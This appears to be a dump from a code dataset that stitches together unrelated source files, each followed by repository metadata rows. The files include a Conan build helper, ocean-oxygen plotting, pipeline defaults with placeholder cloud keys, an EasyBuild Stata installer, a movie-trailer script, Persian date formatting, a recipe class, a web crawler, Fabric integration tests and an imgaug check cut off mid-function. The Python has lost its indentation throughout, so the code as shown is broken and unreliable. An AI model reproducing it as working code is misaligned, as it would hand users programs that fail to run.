fp.write(c + os.linesep)
fp.write(os.linesep)
fp.write("[options]" + os.linesep)
for c in self.channels:
fp.write("{}:shared={}{}".format(c.split('/')[0], self.is_shared, os.linesep))
fp.write(os.linesep)
contents = """\
[generators]
json
[imports]
bin, *.dll -> ./bin
lib, *.lib* -> ./lib
lib, *.dylib* -> ./lib
lib, *.so* -> ./lib
lib, *.a* -> ./lib
include, * -> ./include
"""
fp.write(contents)
def build(self):
""" Call conan command to build the package with the conanfile """
ui.info(" * Building library with conan in", self.package_path)
qisys.command.check_is_in_path("conan")
conan_path = qisys.command.find_program("conan")
cmd = [conan_path, "install", self.conanfile, "--build", "--install-folder", self.package_path]
qisys.command.call(cmd)
def clean(self):
""" Remove the temporary directory """
ui.info(" * Removing temporary directory")
qisys.sh.rm(self.temp_dir)
|
bsd-3-clause
| 4,813,513,214,411,253,000
| 35.520833
| 103
| 0.611238
| false
| 3.682773
| false
| false
| false
|
acapet/GHER-POSTPROC
|
Examples/O2bottomClim.py
|
1
|
1744
|
# We only import librairies needed for plotting
# Other librairies are imported in the class definition file, G3D_class.py,
# which contains all process and variables function definition.
import matplotlib
matplotlib.use('pdf')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime as dt
import numpy.ma as ma
import N3D_class
import G3D_class
# We instantiate an object of the class G3D, just by giving the path to the netcdf file to work with
# Up to now I'm working with 4D netcdf files containing several variables.
# Outputs from different files can be merged easily, as can be seen in other examples
for mm in range(1,13):
Ni = N3D_class.N3D('BS_1d_20100101_20171231_ptrc_T_2010'+format(mm,'02')+'-2010'+format(mm,'02')+'.nc','local_NEMO_004.yml')
Ni.testvar('O2bottom')
NmaskDS= (Ni.bat<120 ) & ~(Ni.bat.mask) # Mask should be True where masked
Ni.apO2=Ni.avgprofileSIGMA(varname='DOX',maskin=NmaskDS)
if mm==1:
N=Ni
else:
N.dates = ma.append(N.dates , Ni.dates,0)
N.time = ma.append(N.time , Ni.time,0)
N.O2bottom = ma.append(N.O2bottom, Ni.O2bottom,0)
N.apO2 = ma.append(N.apO2 , Ni.apO2,0)
del Ni
N.makeclim('O2bottom')
N.mapMonthlyClim('O2bottom',figsuffix='SHELF',cmapname='oxy', subdomain="NWS", Clim=[0,300])
N.mapMonthlyClim('O2bottom',figsuffix='WHOLE',cmapname='oxy', Clim=[0,30])
N.mapMonthlyClim('O2bottom',figsuffix='WHOLEb',cmapname='oxy', Clim=[0,3])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',Clim=[0,300])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',zlim=[-200,0])
N.plotprofile('apO2',z=-N.z[0,:,0,0],cmapname='oxy',Clim=[0,3],zlim=[-2200,-1000],figout='apO2b')
|
gpl-3.0
| -861,104,597,107,073,700
| 38.636364
| 129
| 0.682913
| false
| 2.678955
| false
| false
| false
|
bloomreach/briefly
|
src/briefly/defaults.py
|
1
|
5344
|
#
# Copyright 2013-2015 BloomReach, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import getpass
from properties import *
# Bare minimum system settings for any pipeline
PIPELINE_DEFAULT_PROPERTIES = Properties(
# System-wide default values.
build_dir = "build",
num_retry = 3,
retry_delay = 10,
username = getpass.getuser(),
log = "${build_dir}/execute.log",
run_threads = 2, # Execution threads
debug = False, # Extra debug information
test_run = False, # Dry-run for check execution flow
# Default values for shell process.
shell = Properties(
max_process = 4,
runner = "/bin/sh",
),
# Default values for java process.
java = Properties(
max_process = 2,
classpath = ["."], # full list of classpath
runner = "java", # full path to java executable.
),
# Default values for hadoop process (local or remote).
hadoop = Properties(
runner = "emr",
jar = None, # s3://<BUCKET>/path/hadoop_jobs.jar
root = "${build_dir}",
bin = "hadoop", # Full path to hadoop binary to execute (local mode only)
),
# Default values for EMR cluster.
emr = Properties(
max_cluster = 2,
cluster_name = "${username}-cluster",
step_name = "${node_hash}",
project_name = None, # Team name or project name to track costs
tags = None, # EC2 tags for the EMR cluster
keyname = None,
instance_groups = [[1, "MASTER", "m1.small"]], # List of instance groups [num, MASTER/CORE, type]
bootstrap_actions = [], # List of bootstrap actions: [[name1, action1, args...], [name2, action2, args...], ...]
# Regular EC2 instance prices. See http://www.ec2instances.info/.
prices = {"t2.micro": 0.01,
"t1.micro": 0.02,
"t2.small": 0.02,
"m1.small": 0.04,
"t2.medium": 0.05,
"m3.medium": 0.07,
"m1.medium": 0.08,
"c3.large": 0.10,
"c1.medium": 0.13,
"m3.large": 0.14,
"m1.large": 0.17,
"r3.large": 0.17,
"c3.xlarge": 0.21,
"m2.xlarge": 0.24,
"m3.xlarge": 0.28,
"m1.xlarge": 0.35,
"r3.xlarge": 0.35,
"c3.2xlarge": 0.42,
"m2.2xlarge": 0.49,
"c1.xlarge": 0.52,
"m3.2xlarge": 0.56,
"g2.2xlarge": 0.65,
"r3.2xlarge": 0.70,
"c3.4xlarge": 0.84,
"i2.xlarge": 0.85,
"m2.4xlarge": 0.98,
"r3.4xlarge": 1.40,
"c3.8xlarge": 1.68,
"i2.2xlarge": 1.70,
"cc2.8xlarge": 2.00,
"cg1.4xlarge": 2.10,
"r3.8xlarge": 2.80,
"hi1.4xlarge": 3.10,
"i2.4xlarge": 3.41,
"cr1.8xlarge": 3.50,
"hs1.8xlarge": 4.60,
"i2.8xlarge": 6.82,},
# Price multiplier for each level. 0 means on-demand instances.
price_upgrade_rate = [0.8, 1.5, 0],
log_uri = None, # S3 location for mapreduce logs e.g. "s3://<BUCKET>/${username}/mr-logs"
ami_version = "2.4.2",
step_timeout = 12 * 60 * 60, # 12 HR (in sec)
),
# Default values for Qubole cluster.
qubole = Properties(
api_url = "https://api2.qubole.com/api",
api_version = "latest",
api_token = None,
aws_region = "us-east-1",
aws_availability_zone = None,
persistent_security_groups = "ElasticMapReduce-slave",
max_cluster = 1,
max_job_per_cluster = 1,
termination_timeout = 5 * 60, # Wait 5 min for cluster termination (in sec).
project_name = None,
hadoop_custom_config = {}, # Custom hadoop configs. Example: {"mapred.output.compress": "true", "mapred.output.compression.type": "BLOCK"}
hadoop_settings = {"master_instance_type": "m1.small", "slave_instance_type": "m1.small", "initial_nodes": 1, "max_nodes": 1}, # Num/type config for the cluster
bootstrap_actions = [], # List of bootstrap actions: [[name1, action1, args...], [name2, action2, args...], ...]
price_upgrade_rate = [0.8, 1.5, 0], # Price multiplier for each level. 0 means on-demand instances.
timeout_for_request = 15, # Timeout for spot instance requests (in min).
log_uri = None, # S3 location for mapreduce logs e.g. "s3://<BUCKET>/${username}/mr-logs"
step_timeout = 43200, # 43200 = 12 * 60 * 60 = 12 HR (in sec).
cluster_id = None, # Default None. If a value is passed, the job is executed on that cluster, and the cluster is not terminated
step_name = "${node_hash}", # If a value is passed, it will be displayed on the qubole analyzer and will help in debugging
),
# Default values for EC2/boto commands.
ec2 = Properties(
key = "S3_ACCESS_KEY",
secret = "S3_SECRET_KEY",
),
)
|
apache-2.0
| -2,506,245,100,201,422,000
| 36.900709
| 164
| 0.580838
| false
| 3.308978
| false
| false
| false
|
pescobar/easybuild-easyblocks
|
easybuild/easyblocks/s/stata.py
|
1
|
3192
|
##
# Copyright 2009-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing Stata, implemented as an easyblock
author: Kenneth Hoste (HPC-UGent)
"""
import os
import re
from easybuild.easyblocks.generic.packedbinary import PackedBinary
from easybuild.tools.build_log import EasyBuildError, print_msg
from easybuild.tools.filetools import change_dir
from easybuild.tools.run import run_cmd, run_cmd_qa
class EB_Stata(PackedBinary):
"""Support for building/installing Stata."""
def install_step(self):
"""Custom install procedure for Stata."""
change_dir(self.installdir)
cmd = os.path.join(self.cfg['start_dir'], 'install')
std_qa = {
"Do you wish to continue\?\s*\(y/n or q to quit\)": 'y',
"Are you sure you want to install into .*\?\s*\(y/n or q\)": 'y',
"Okay to proceed\s*\(y/n or q to quit\)": 'y',
}
no_qa = [
"About to proceed with installation:",
"uncompressing files",
"extracting files",
"setting permissions",
]
run_cmd_qa(cmd, {}, no_qa=no_qa, std_qa=std_qa, log_all=True, simple=True)
print_msg("Note: you need to manually run ./stinit in %s to initialise the license for Stata!" % self.installdir)
def sanity_check_step(self):
"""Custom sanity check for Stata."""
custom_paths = {
'files': ['stata', 'xstata'],
'dirs': [],
}
super(EB_Stata, self).sanity_check_step(custom_paths=custom_paths)
# make sure required libpng library is there for Stata
# Stata depends on a very old version of libpng, so we need to provide it
out, _ = run_cmd("ldd %s" % os.path.join(self.installdir, 'stata'), simple=False)
regex = re.compile('libpng.*not found', re.M)
if regex.search(out):
raise EasyBuildError("Required libpng library for 'stata' is not available")
def make_module_req_guess(self):
"""Add top install directory to $PATH for Stata"""
guesses = super(EB_Stata, self).make_module_req_guess()
guesses['PATH'] = ['']
return guesses
|
gpl-2.0
| 55,361,995,667,855,550
| 37.926829
| 121
| 0.656955
| false
| 3.519294
| false
| false
| false
|
emguy/Movie-Trailer
|
media.py
|
1
|
3386
|
# -*- coding: utf-8 -*-
#
# NOTE: This program is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 3, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Bugs can be reported to Yu Zhang <emguy2000@gmail.com>.
#
# File Name : media.py
# Last Modified : Mon, Feb 01, 2016 3:29:14 PM
import json
import urllib
class Movie():
"""
A Movie object which stores the meta-information about a movie.
All movie data is retrieved from the Open Movie Database (OMDB).
Attributes:
title (str): title of the movie
year (str): the year of production
genre (str): the genre of the movie
plot (str): the plot of the movie
director (str): the name of the movie director
actors (str):
poster_image_url (str): the URL to the movie thumbnail
trailer_youtube_url( str): the URL to the movie trailer (on youtube)
"""
# we retrive movie data from the Open Movie Database (OMDB)
OMDB_API = "http://www.omdbapi.com/?y=&plot=short&r=json&t="
# constructor
def __init__(self, title, trailer_url):
# the requesting url
url = Movie.OMDB_API + title
# the json response
response = urllib.urlopen(url, trailer_url)
# parse json obj
obj = json.load(response)
# load the movie data
self.title = obj["Title"]
self.year = obj["Year"]
self.genre = obj["Genre"]
self.plot = obj["Plot"]
self.director = obj["Director"]
self.actors = obj["Actors"]
self.poster_image_url = obj["Poster"]
self.trailer_youtube_url = trailer_url
# This list stores an array of created movies objects
movie_list = list()
# add movie #1
title = "Star Trek Beyond"
trailer_url = "https://www.youtube.com/watch?v=XRVD32rnzOw"
movie_list.append(Movie(title, trailer_url))
# add movie #2
title = "10 Cloverfield Lane"
trailer_url = "https://www.youtube.com/watch?v=yQy-ANhnUpE"
movie_list.append(Movie(title, trailer_url))
# add movie #3
title = "The Big Short"
trailer_url = "https://www.youtube.com/watch?v=dxAcIWDi8ps"
movie_list.append(Movie(title, trailer_url))
# add movie #4
title = "Zoolander 2"
trailer_url = "https://www.youtube.com/watch?v=4CL4LNWHegk"
movie_list.append(Movie(title, trailer_url))
# add movie #5
title = "ANOMALISA"
trailer_url = "https://www.youtube.com/watch?v=WQkHA3fHk_0"
movie_list.append(Movie(title, trailer_url))
# add movie #6
title = "Daddy's Home"
trailer_url = "https://www.youtube.com/watch?v=Ngptwcz3-JA"
movie_list.append(Movie(title, trailer_url))
# add movie #7
title = "The Little Prince"
trailer_url = "https://www.youtube.com/watch?v=ihi491RQo5A"
movie_list.append(Movie(title, trailer_url))
# add movie #8
title = "13 Hours: The Secret Soldiers of Benghazi"
trailer_url = "https://www.youtube.com/watch?v=4CJBuUwd0Os"
movie_list.append(Movie(title, trailer_url))
# add movie #9
title = "Barnyard"
trailer_url = "https://www.youtube.com/watch?v=s5soJDEbzIc"
movie_list.append(Movie(title, trailer_url))
|
gpl-3.0
| -1,718,229,491,148,597,800
| 31.247619
| 73
| 0.680154
| false
| 3.120737
| false
| false
| false
|
Karajlug/karajlug
|
viewhelper/models.py
|
1
|
2334
|
# coding: utf-8
# -----------------------------------------------------------------------------
# Karajlug.org
# Copyright (C) 2010-2013 Karajlug community
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------------
from calverter import Calverter
from django.conf import settings
import urllib
DAYS_NAMES = ("شنبه", "یکشنبه", "دوشنبه", "سه شنبه",
"چهارشنبه", "پنج شنبه", "جمعه")
PERSIAN_DIGITS = {"1": "۱", "2": "۲", "3": "۳", "4": "۴", "5": "۵",
"6": "۶", "7": "۷", "8": "۸", "9": "۹", "0": "۰"}
MONTHS_NAMES = ("فروردین", "اردیبهشت", "خرداد", "تیر", "مرداد",
"شهریور", "مهر", "آبان", "آذر", "دی", "بهمن",
"اسفند")
def format_date(date, lang):
if lang == "fa":
cal = Calverter()
jd = cal.gregorian_to_jd(date.year, date.month,
date.day)
wday = cal.jwday(jd)
jalali = cal.jd_to_jalali(jd)
result = "%s، %d %s %d" % (DAYS_NAMES[wday], jalali[2],
MONTHS_NAMES[jalali[1] - 1], jalali[0])
return to_persian_digits(result)
return date
def to_persian_digits(datestr):
for i in PERSIAN_DIGITS:
datestr = datestr.replace(i, PERSIAN_DIGITS[i])
return datestr
def quote(url):
return urllib.quote_plus("%s" % url)
def full_path(absolute_url):
site = getattr(settings, "URL", "www.karajlug.org")
return "http://%s%s" % (site, absolute_url)
|
gpl-2.0
| 1,601,960,923,630,854,100
| 32.757576
| 79
| 0.557252
| false
| 3.063274
| false
| false
| false
|
kaguna/Yummy-Recipes
|
classes/categories.py
|
1
|
5660
|
# This file handles the class for the categories and the
# CRUD methods associated to the categories
import re
from classes.recipes import Recipes
class Categories(object):
"""This class will handle all the functions related to the categories and recipes"""
categories = []
def __init__(self, category_name=None, recipe_name=None):
"""constructor to initialize the global variables"""
self.category_name = category_name
self.recipe_name = recipe_name
self.newRecipe = Recipes()
def create_category(self, category_name, category_owner):
"""This will create new and unique category"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
# The personal_categories variable hold several categories associated with the user in session.
# In the case above i am using the list comprehension to retrieve the categories.
similar_category_names = [searched_cat_name for searched_cat_name in personal_categories
if searched_cat_name[0] == category_name]
# The similar_category_names checks whether there exists a similar category name to the one
# provided by the user.
# In the case above i am using the list comprehension.
regexcategory_name = "[a-zA-Z0-9- .]"
if re.match(regexcategory_name, category_name):
if category_name != '' and category_name != ' ' and category_name.strip():
if self.categories != []:
if similar_category_names == []:
# If no such name registration takes place.
self.categories.append([category_name, category_owner, ])
return "check_category_creation_success"
return "check_category_name_existence"
self.categories.append([category_name, category_owner, ])
return "check_category_creation_success"
return "check_null_empty_field"
return "check_invalid_category_name"
def view_category(self, category_owner):
"""
This will display the categories for the user in session
"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
# personal_categories holds several categories belonging to the owner who has logged in using
# using list comprehensions.
return personal_categories
def edit_category(self, current_name, new_name, category_owner):
"""This method will aid in updating the category name"""
personal_categories = [owner_list_of_categories for owner_list_of_categories in self.categories
if category_owner in owner_list_of_categories]
similar_category_name = [searched_cat_name for searched_cat_name in personal_categories
if searched_cat_name[0] == new_name]
regexcategory_name = "[a-zA-Z0-9- .]"
if re.match(regexcategory_name, new_name):
if new_name != '' and new_name.strip():
for categoryList in personal_categories:
if current_name in categoryList:
if similar_category_name == []:
category_name_index = personal_categories.index(categoryList)
personal_categories[category_name_index][0] = new_name
# Update the category name in the recipes list
for recipeList in self.newRecipe.recipes:
if current_name in recipeList:
for index in range(0, len(self.newRecipe.recipes)):
# loop all the indexes with the current
self.newRecipe.recipes[index][1] = new_name
return "success_on_edit"
return "success_on_edit"
return "check_category_name_existence"
return "check_null_empty_field"
return "check_invalid_category_name"
def delete_category(self, category_name, category_owner):
"""
This will help in deleting the categories from user in session by providing the
category name and the and the owner of the category.
"""
personal_categories = [owner_list for owner_list in self.categories
if category_owner in owner_list]
specific_category_recipes = [specific_recipe for specific_recipe in self.newRecipe.recipes
if category_owner == specific_recipe[2] and
category_name == specific_recipe[1]]
# Using list comprehensions retrieve all the recipes for a specific category
for recipeList in self.newRecipe.recipes:
if category_name in recipeList:
for position_of_recipe in range(0, len(specific_category_recipes)):
# loop all the indexes with the recipes of the specific category
del specific_category_recipes[position_of_recipe]
for categoryList in personal_categories:
if category_name in categoryList:
category_list_position = personal_categories.index(categoryList)
del self.categories[category_list_position]
del personal_categories[category_list_position]
return personal_categories
|
mit
| 8,747,304,260,757,726,000
| 51.906542
| 103
| 0.59682
| false
| 4.921739
| false
| false
| false
|
petrushev/mkopen
|
mkopen/crawlers/dksk.py
|
1
|
4021
|
# -*- coding: utf-8 -*-
#---------- Државна комисија за спречување корупција ----------
import requests as rq
from StringIO import StringIO
import csv
from datetime import datetime
from time import sleep
from random import random
import locale
from lxml.html import fromstring
from mkopen.db.models import Data, Version, catalog2uuid, data2uuid
from mkopen.utils import setlocale
TODAY = datetime.utcnow().date()
CATALOG_PREFIX = u"Државна комисија за спречување корупција"
BASE = 'http://www.dksk.org.mk/imoti_2'
def main(session):
cur_page = 1
final_page = False
collected_catalogs = []
while not final_page:
start = BASE + '/index.php?search=%d' % cur_page
print 'page:', cur_page
sleep(random() * 0.5 + 0.5)
content = rq.get(start).content
doc = fromstring(content)
# get links to detail pages
detail_a = doc.cssselect("a[href^=detail\.php]")
for link in detail_a:
url = BASE + '/' + link.attrib['href']
catalog, content = crawl_details(url)
if catalog is not None and content is not None:
collected_catalogs.append(','.join(reversed(catalog)))
catalog = (CATALOG_PREFIX, ) + catalog
metadata = {'url': url,
'page_url': start,
'file_type': 'csv'}
save(session, catalog, content, metadata)
# check if final page
next_ = doc.cssselect("img[src='img/forward.png']")
final_page = (len(next_) == 0)
cur_page = cur_page + 1
with setlocale():
collected_catalogs.sort(cmp=locale.strcoll)
# save active pages
catalog = (CATALOG_PREFIX, u'Анкетни листови', u'Активни')
content = ('\n'.join(collected_catalogs)).encode('utf-8')
metadata = {'file_type': 'csv'}
save(session, catalog, content, metadata)
def crawl_details(url):
sleep(random() * 0.5 + 0.5)
content = rq.get(url).content
doc = fromstring(content)
tables = doc.cssselect('table.class')
if len(tables) < 2:
# no details
return None, None
definer_table, details_table = tables[0], tables[1]
tr = definer_table.cssselect('tr')[1]
definer = [td.text_content().strip() for td in tr.cssselect('td')]
definer = (definer[2], definer[3], definer[0] + ' ' + definer[1])
csv_handle = StringIO()
writer = csv.writer(csv_handle)
for tr in details_table.cssselect('tr'):
line = [td.text_content().strip().encode('utf-8')
for td in tr.cssselect('td')]
writer.writerow(line)
csv_content = csv_handle.getvalue()
csv_handle.close()
# resort data
csv_content = csv_content.split('\n')
csv_header = csv_content.pop(0)
csv_content.sort()
csv_content.insert(0, csv_header)
csv_content = '\n'.join(csv_content)
return definer, csv_content
def save(session, catalog_id, data, metadata):
# locate entry
data_id = catalog2uuid(catalog_id)
entry = Data.load(session, id=data_id)
if entry is None:
entry = Data(id=data_id, catalog_id=catalog_id, last_checked=TODAY)
session.add(entry)
elif entry.last_checked == TODAY:
# data is crawled and recently checked
print 'skip:' , entry
return
# check for changes
data_hash = data2uuid(data)
entry_version = Version.load(session, id=data_hash)
if entry_version is None:
# data is changed
metadata = dict(metadata)
metadata['file_type'] = 'csv'
entry_version = Version(id=data_hash, data=data, updated=TODAY, metadata=metadata)
entry_version.ref = entry
elif entry_version.ref.id != entry.id:
print 'data mistmatch:', entry_version.ref.id, entry.id
# update entry for last check
entry.last_checked = TODAY
session.commit()
return entry_version
|
gpl-3.0
| -767,376,997,350,376,600
| 27.258993
| 90
| 0.60947
| false
| 3.360137
| false
| false
| false
|
WielderOfMjoelnir/pypeira
|
main.py
|
1
|
1118
|
import pypeira.pypeira as pype
if __name__ == "__main__":
# Create instance of IRA (not necessary but much more convenient for now)
ira = pype.IRA()
path = "./data"
# Read files. The read() function will walk from the given dir and find all files satisfying
# the given criteria. Set 'walk' to False if this is not wanted.
data = ira.read(path, dtype='bcd', walk=True)
# Uncomment plot_brightest(data) below, and comment out EVERYTHING after this line for the easiest way.
# ira.plot_brightest(data)
# get_brigthest() returns a (index, maximum_value)-pair
idx, max_val = ira.get_brightest(data)
# pixel_data() then collects all the values of that specific pixel, for all the HDUs in the "data" list.
xs, ys = ira.pixel_data(idx, data)
# Finally one simply plots using Matplotlib
# NOTE: Hot pixels have not been removed at this stage, so some use of plt.ylim() is highly recommended.
import matplotlib.pyplot as plt
plt.plot(xs, ys)
plt.ylabel('Flux (MJy/sr)')
plt.title('Flux vs. Time')
plt.xlabel('Time (BJD)')
plt.show()
|
mit
| -8,322,726,822,375,709,000
| 35.064516
| 108
| 0.668157
| false
| 3.398176
| false
| false
| false
|
xLegoz/fabric
|
integration/test_operations.py
|
1
|
6882
|
from six import StringIO as StringIO
import os
import posixpath
import shutil
from fabric.api import (
run, path, put, sudo, abort, warn_only, env, cd, local, settings, get
)
from fabric.contrib.files import exists
from utils import Integration
def assert_mode(path, mode):
remote_mode = run("stat -c \"%%a\" \"%s\"" % path).stdout
assert remote_mode == mode, "remote %r != expected %r" % (remote_mode, mode)
class TestOperations(Integration):
filepath = "/tmp/whocares"
dirpath = "/tmp/whatever/bin"
not_owned = "/tmp/notmine"
def setup(self):
super(TestOperations, self).setup()
run("mkdir -p %s" % " ".join([self.dirpath, self.not_owned]))
def teardown(self):
super(TestOperations, self).teardown()
# Revert any chown crap from put sudo tests
sudo("chown %s ." % env.user)
# Nuke to prevent bleed
sudo("rm -rf %s" % " ".join([self.dirpath, self.filepath]))
sudo("rm -rf %s" % self.not_owned)
def test_no_trailing_space_in_shell_path_in_run(self):
put(StringIO("#!/bin/bash\necho hi"), "%s/myapp" % self.dirpath, mode="0755")
with path(self.dirpath):
assert run('myapp').stdout == 'hi'
def test_string_put_mode_arg_doesnt_error(self):
put(StringIO("#!/bin/bash\necho hi"), self.filepath, mode="0755")
assert_mode(self.filepath, "755")
def test_int_put_mode_works_ok_too(self):
put(StringIO("#!/bin/bash\necho hi"), self.filepath, mode=0o755)
assert_mode(self.filepath, "755")
def _chown(self, target):
sudo("chown root %s" % target)
def _put_via_sudo(self, source=None, target_suffix='myfile', **kwargs):
# Ensure target dir prefix is not owned by our user (so we fail unless
# the sudo part of things is working)
self._chown(self.not_owned)
source = source if source else StringIO("whatever")
# Drop temp file into that dir, via use_sudo, + any kwargs
return put(
source,
self.not_owned + '/' + target_suffix,
use_sudo=True,
**kwargs
)
def test_put_with_use_sudo(self):
self._put_via_sudo()
def test_put_with_dir_and_use_sudo(self):
# Test cwd should be root of fabric source tree. Use our own folder as
# the source, meh.
self._put_via_sudo(source='integration', target_suffix='')
def test_put_with_use_sudo_and_custom_temp_dir(self):
# TODO: allow dependency injection in sftp.put or w/e, test it in
# isolation instead.
# For now, just half-ass it by ensuring $HOME isn't writable
# temporarily.
self._chown('.')
self._put_via_sudo(temp_dir='/tmp')
def test_put_with_use_sudo_dir_and_custom_temp_dir(self):
self._chown('.')
self._put_via_sudo(source='integration', target_suffix='', temp_dir='/tmp')
def test_put_use_sudo_and_explicit_mode(self):
# Setup
target_dir = posixpath.join(self.filepath, 'blah')
subdir = "inner"
subdir_abs = posixpath.join(target_dir, subdir)
filename = "whatever.txt"
target_file = posixpath.join(subdir_abs, filename)
run("mkdir -p %s" % subdir_abs)
self._chown(subdir_abs)
local_path = os.path.join('/tmp', filename)
with open(local_path, 'w+') as fd:
fd.write('stuff\n')
# Upload + assert
with cd(target_dir):
put(local_path, subdir, use_sudo=True, mode='777')
assert_mode(target_file, '777')
def test_put_file_to_dir_with_use_sudo_and_mirror_mode(self):
# Ensure mode of local file, umask varies on eg travis vs various
# localhosts
source = 'whatever.txt'
try:
local("touch %s" % source)
local("chmod 644 %s" % source)
# Target for _put_via_sudo is a directory by default
uploaded = self._put_via_sudo(
source=source, mirror_local_mode=True
)
assert_mode(uploaded[0], '644')
finally:
local("rm -f %s" % source)
def test_put_directory_use_sudo_and_spaces(self):
localdir = 'I have spaces'
localfile = os.path.join(localdir, 'file.txt')
os.mkdir(localdir)
with open(localfile, 'w') as fd:
fd.write('stuff\n')
try:
uploaded = self._put_via_sudo(localdir, target_suffix='')
# Kinda dumb, put() would've died if it couldn't do it, but.
assert exists(uploaded[0])
assert exists(posixpath.dirname(uploaded[0]))
finally:
shutil.rmtree(localdir)
def test_agent_forwarding_functions(self):
# When paramiko #399 is present this will hang indefinitely
with settings(forward_agent=True):
run('ssh-add -L')
def test_get_with_use_sudo_unowned_file(self):
# Ensure target is not normally readable by us
target = self.filepath
sudo("echo 'nope' > %s" % target)
sudo("chown root:root %s" % target)
sudo("chmod 0440 %s" % target)
# Pull down with use_sudo, confirm contents
local_ = StringIO()
result = get(
local_path=local_,
remote_path=target,
use_sudo=True,
)
assert local_.getvalue() == "nope\n"
def test_get_with_use_sudo_groupowned_file(self):
# Issue #1226: file gotten w/ use_sudo, file normally readable via
# group perms (yes - so use_sudo not required - full use case involves
# full-directory get() where use_sudo *is* required). Prior to fix,
# temp file is chmod 404 which seems to cause perm denied due to group
# membership (despite 'other' readability).
target = self.filepath
sudo("echo 'nope' > %s" % target)
# Same group as connected user
gid = run("id -g")
sudo("chown root:%s %s" % (gid, target))
# Same perms as bug use case (only really need group read)
sudo("chmod 0640 %s" % target)
# Do eet
local_ = StringIO()
result = get(
local_path=local_,
remote_path=target,
use_sudo=True,
)
assert local_.getvalue() == "nope\n"
def test_get_from_unreadable_dir(self):
# Put file in dir as normal user
remotepath = "%s/myfile.txt" % self.dirpath
run("echo 'foo' > %s" % remotepath)
# Make dir unreadable (but still executable - impossible to obtain
# file if dir is both unreadable and unexecutable)
sudo("chown root:root %s" % self.dirpath)
sudo("chmod 711 %s" % self.dirpath)
# Try gettin' it
local_ = StringIO()
get(local_path=local_, remote_path=remotepath)
assert local_.getvalue() == 'foo\n'
|
bsd-2-clause
| -6,177,240,608,647,160,000
| 36
| 85
| 0.586022
| false
| 3.637421
| true
| false
| false
|
nektor211/imgaug
|
tests/check_background_augmentation.py
|
1
|
3270
|
from __future__ import print_function, division
import imgaug as ia
from imgaug import augmenters as iaa
from scipy import misc, ndimage
import numpy as np
from skimage import data
def main():
augseq = iaa.Sequential([
iaa.Fliplr(0.5),
iaa.CoarseDropout(p=0.1, size_percent=0.1)
])
print("------------------")
print("augseq.augment_batches(batches, background=True)")
print("------------------")
batches = list(load_images())
batches_aug = augseq.augment_batches(batches, background=True)
images_aug = []
keypoints_aug = []
for batch_aug in batches_aug:
images_aug.append(batch_aug.images_aug)
keypoints_aug.append(batch_aug.keypoints_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
print("------------------")
print("augseq.augment_batches(batches, background=True) -> only images")
print("------------------")
batches = list(load_images())
batches = [batch.images for batch in batches]
batches_aug = augseq.augment_batches(batches, background=True)
images_aug = []
keypoints_aug = None
for batch_aug in batches_aug:
images_aug.append(batch_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
print("------------------")
print("BackgroundAugmenter")
print("------------------")
batch_loader = ia.BatchLoader(load_images)
bg_augmenter = ia.BackgroundAugmenter(batch_loader, augseq)
images_aug = []
keypoints_aug = []
while True:
print("Next batch...")
batch = bg_augmenter.get_batch()
if batch is None:
print("Finished.")
break
images_aug.append(batch.images_aug)
keypoints_aug.append(batch.keypoints_aug)
misc.imshow(draw_grid(images_aug, keypoints_aug))
def load_images():
batch_size = 4
astronaut = data.astronaut()
astronaut = ia.imresize_single_image(astronaut, (64, 64))
kps = ia.KeypointsOnImage([ia.Keypoint(x=15, y=25)], shape=astronaut.shape)
counter = 0
for i in range(10):
batch_images = []
batch_kps = []
for b in range(batch_size):
astronaut_text = ia.draw_text(astronaut, x=0, y=0, text="%d" % (counter,), color=[0, 255, 0], size=16)
batch_images.append(astronaut_text)
batch_kps.append(kps)
counter += 1
batch = ia.Batch(
images=np.array(batch_images, dtype=np.uint8),
keypoints=batch_kps
)
yield batch
def draw_grid(images_aug, keypoints_aug):
if keypoints_aug is None:
keypoints_aug = []
for bidx in range(len(images_aug)):
keypoints_aug.append([None for image in images_aug[bidx]])
images_kps_batches = []
for bidx in range(len(images_aug)):
images_kps_batch = []
